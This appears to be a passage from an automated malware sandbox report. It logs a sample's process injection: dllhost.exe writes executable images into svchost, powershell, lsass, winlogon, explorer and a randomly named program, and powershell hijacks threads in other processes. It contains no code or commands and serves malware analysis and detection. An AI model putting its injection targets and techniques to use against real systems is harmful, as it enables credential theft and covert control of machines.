Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BF59D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 253FC3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2A5AF330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A4670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1780D3E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BF59D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 253FC3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2A5AF330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A46A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1780D3E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 21D595A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 21D59C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1EA080B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085AEE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085CF50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 29E3BCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 29E3BF00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1956F090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2A3ED7F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CD8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CF9E0000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4004 base: 86A0000 value: 4D
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4004 base: 86A0000 value: 4D
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 356Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 2432
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 6400
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: 356 1Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 3000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 56B245010
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B010000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246EDE60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A19B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275D2660000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDCC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227D9540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 220AEFD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 220AF660000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 202A22A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D25AA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A63950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1834ABA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 256EBEB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2568E1B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 226A7DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 12A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22B68FC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 11CD5BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24708EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26E569B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6984F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 86A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B409660000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C5325C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24708EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15EC91C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6984F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 86A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000
